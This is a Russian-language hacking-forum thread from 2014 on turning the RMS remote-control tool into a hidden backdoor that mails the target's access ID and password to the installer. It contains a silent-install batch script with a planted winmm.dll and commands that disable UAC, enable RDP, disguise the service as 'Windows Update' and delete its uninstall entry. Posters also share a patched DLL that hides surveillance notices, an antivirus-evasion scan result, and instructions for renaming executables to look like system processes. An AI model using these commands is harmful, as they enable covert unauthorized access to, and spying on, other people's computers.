RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Цифровая подпись слетает на любой версии это логично если трогать файл и попытаться его изменить!
     
    8 фев 2014
  2. art22
    art22 Новичок
    Симпатии:
    3
    бляя по этому наверное мои слетели( значит придется опять 5,5 установить!! сука 5, 6!! не хотел его устанавливать!(
     
    8 фев 2014
  3. СтёпаИвася
    СтёпаИвася Новичок
    Симпатии:
    0
    Пример моего ЦМДэшника, с блокировкой повторной установки. Может, кому нужно...

    @chcp 1251
    setlocal ENABLEDELAYEDEXPANSION
    Set Process=rfusclient
    tasklist | Find /i "%Process%.exe" || (goto Else)
    :THEN
    Exit
    Goto end
    :ELSE
    mkdir "%ProgramFiles%\Remote Manipulator System - Host"
    copy winmm.dll "%ProgramFiles%\Remote Manipulator System - Host" >nul
    @MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
    @MsiExec /x {54067864-C0E7-47DB-A0C1-D6C874CE6BD8} /qn REBOOT=ReallySuppress
    @ping 127.0.0.1
    @MsiExec /I "rms.host5.5ru.msi" /qn
    @ping 127.0.0.1
    @attrib +h +s +r "%programfiles%\Remote Manipulator System - Host"
    @attrib +h +s +r "%ProgramFiles(x86)%\Remote Manipulator System - Host"
    @attrib +h +s +r /d /s "%programfiles%\Remote Manipulator System - Host\*.*"
    @attrib +h +s +r /d /s "%ProgramFiles(x86)%\Remote Manipulator System - Host\*.*"

    Особенность блокировки в том, что если уже запущен процесс "rfusclient", ЦМДэшник закрывается, что собственно и прописано в его первых пяти строках
     
    8 фев 2014
  4. virvoyeur
    virvoyeur Новичок
    Симпатии:
    0
    СтёпаИвася если не трудно напиши батничек как ( если это вообще возможно- работает ) запретить закрытие рмс и убрать его с установленных программ - да был тут гдето такой - не работает - сделал папку не видемой не проблема - но в установленых программах по средствам винды его видно и легко удалить ( и можно его вообще сделать не убиваемым в просессах ? для 7 ки -32 и 64 х
     
    8 фев 2014
  5. ww2
    ww2 Продвинутый
    Симпатии:
    12
    Ставит галочку в свойствах системы разрешить подключение по RDP, чтоб в RMS работало
    PHP:
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f
    Переименование имени службы в Windows Update
    PHP:
    sc config RManService displayname= "Windows Update"
    Дополнительная информация для службы переименованной
    PHP:
    sc description RManService "Windows Media alloy media files downloads"
    Назначает автоматический запуск службы
    PHP:
    sc config RManService start= "auto"
    Удаляет из списка установленных программ, для версии 5.6
    PHP:
    reg delete "HKLM\SOFTWARE\Classes\Installer\Products\BA5437DC26F19344BADA391C3E2EC10B" /f
    Отключает UAC контроль учётных записей Windows
    PHP:
    REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    PS: этот параметр вступает в силу только после reboot
     
    9 фев 2014
    2 пользователям это понравилось.
  6. labvictx
    labvictx Новичок
    Симпатии:
    0
    Плиз, подскажи о какой проге идет речь? Что за программа "рк2" как она правильно пишется?:dontknow:
     
    10 фев 2014
  7. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    Подправил длл.
    По прежнему прячет окно о наблюдении и мессагу об отправке мыла. Так же делает папку с рмс скрытой и удаляет ключ деинсталляции (невиден в установленных). Это чтоб с батниками не трахаться.
    [+] скан
    Название файла: winmm.dll
    Размер файла: 22016 байт
    Дата сканирования: Sun, 09 Feb 14 15:21:29 -0500
    MD5-хэш файла: 97177800b393f641b29ab36a44910ff0

    Результат: 1 из 36

    Ad-Aware: OK
    AhnLab V3 Internet Security: OK
    ArcaVir: OK
    Avast: OK
    AVG: OK
    Avira: OK
    Bitdefender/BullGuard: OK
    BullGuard Internet Security 2013: OK
    Comodo: Virus.Win32.Virut.CE@86480074
    Dr.Web: OK
    Emsisoft Anti-Malware (a-squared Anti-Malware): OK
    eScan Internet Security Suite 14: OK
    Fortinet 5: OK
    F-Prot: OK
    F-Secure 2014: OK
    G Data: OK
    IKARUS: OK
    Immunet/ClamAV: OK
    K7 Ultimate: OK
    Kaspersky Internet Security 2014: OK
    McAfee Total Protection 2013: OK
    Microsoft Security Essentials: OK
    NANO: OK
    NOD32: OK
    Norman: OK
    Norton Internet Security: OK
    Outpost Security Suite Pro 8.0: OK
    Quick Heal: OK
    Sophos: OK
    SUPERAntiSpyware: OK
    Total Defense Internet Security: OK
    Trendmicro Titanium Internet Security: OK
    Twister Antivirus 8: OK
    VBA: OK
    VIPRE Internet Security 2013: OK
    Virit: OK

    Scan report generated by Scanner.FuckAV.ru
    [свернуть]


    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 5 or greater.**
     
    10 фев 2014
  8. Ohiles028
    Ohiles028 Новичок
    Симпатии:
    0
    если не трудно дай ссылочку в личку а то из за хайда не могу скачать, очень надо
     
    10 фев 2014
  9. virvoyeur
    virvoyeur Новичок
    Симпатии:
    0
    аналогично ( но просить без толку не дадут ;)

    хотя бы уже с давно зарегенными как то делились - а то прячете от новичков типа учитесь собирайте сами - пишите статьи и вам повысят репу - пока я все выучу будет позно и то что спрятоно под хайдом мне и не надо будет :) - ладно дело ваше

    labvictx - cam2 - тут в соседней ветке с радмином есть про нее - все бы хорошо - с ней но палится уже всем и нет записи на приемнике - как то все разрабы подобных прог забывают это сделать или спецом )
     
    11 фев 2014
  10. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    Под хайдом нету готовой сборки. Там лежит это. /facepalm
    Так что
     
    11 фев 2014
  11. subor
    subor Новичок
    Симпатии:
    1
    В чем разница с этим?
     
    11 фев 2014
  12. nonamed
    nonamed Новичок
    Симпатии:
    0
    Не заходил сюда начиная со страницы ~100. Как всё проще нынче стало однако)) Кинул ДЛЛ и всё. В сочетании с punto switcher огонь) Будем проверить, спасибо.
     
    12 фев 2014
  13. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Особенно если пунто логи отсылает сам)
     
    13 фев 2014
  14. nonamed
    nonamed Новичок
    Симпатии:
    0
    Такой вопрос. Настроил так, что при установке генерирует новый ID-Pass и высылает на мыло. Если в момент установки пользователь не подключен к сети то всё, приехали? Или он сделает эти движения тогда, когда появится интернет?

    P.S. А действительно, всё работает без всяких танцев. Для полного счастья еще бы как-нибудь exe-шник переименовать, чтоб глаза в диспетчере не мозолил.
     
    Последнее редактирование: 13 фев 2014
    13 фев 2014
  15. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Ты про пунто или про рмс? Если про пунто, то переименуй exe так, чтобы было одинаковое кол-во символов как и у процесса до переименования (punto.exe к примеру centr.exe)
     
    13 фев 2014
  16. ww2
    ww2 Продвинутый
    Симпатии:
    12
    или lsass.exe :D
     
    13 фев 2014
  17. nonamed
    nonamed Новичок
    Симпатии:
    0
    Нет, я про РМС. Как-то раньше пробовал переименовывать, но без толку. Через Microsoft Install Shield Pro можно папку назначения изменить, но в диспетчере всё равно "висит" rfusclient и rutserv которые обнаружить и убить не составляет проблем для более-менее грамотных людей.
     
    13 фев 2014
  18. ww2
    ww2 Продвинутый
    Симпатии:
    12
    Переименовать можно)
    1. Качаем HeX к примеру hxd или любой другой и Restorator
    2. Распаковываем MSI
    3. Берём файлики rutserv.exe и rfusclient.exe
    4. Открываем сначала rutserv.exe и нажимаем Win+R (действие: заменить)
    5. Что на что:
    rutserv.exe на svnhost.exe
    Готово, сохраняем. открываем Restorator удаляем иконки, Доп. инфу и.т.д.
    переименовываем сам rutserv.exe в svnhost.exe разумеется
    Аналогично те же действия и для файлика rfusclient.exe
    PS: Работает на всех версиях кроме последних 5.5 и 5.6
    на версиях 5.5 и 5.6 если проделать процедуру то вызов End Process идёт, можно сделать автоподнятие конешно но это гемор а не конфетка будет :D
     
    13 фев 2014
  19. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    При всех этих манипуляциях теряется цифровая подпись!!! Проще скрывать процессы чем переименовывать(менее палевно). Да и переименование немного не правильно описано выше...
     
    13 фев 2014
  20. nonamed
    nonamed Новичок
    Симпатии:
    0
    Окей. Как это сделать проще всего? Из тех способов, что я знаю, нужно довешивать на машину некоторое дополнительное ПО. Проще как-то можно или "мы не ищем лёгких путей"?))
     
    Последнее редактирование: 13 фев 2014
    13 фев 2014
Статус темы:
Закрыта.
Загрузка...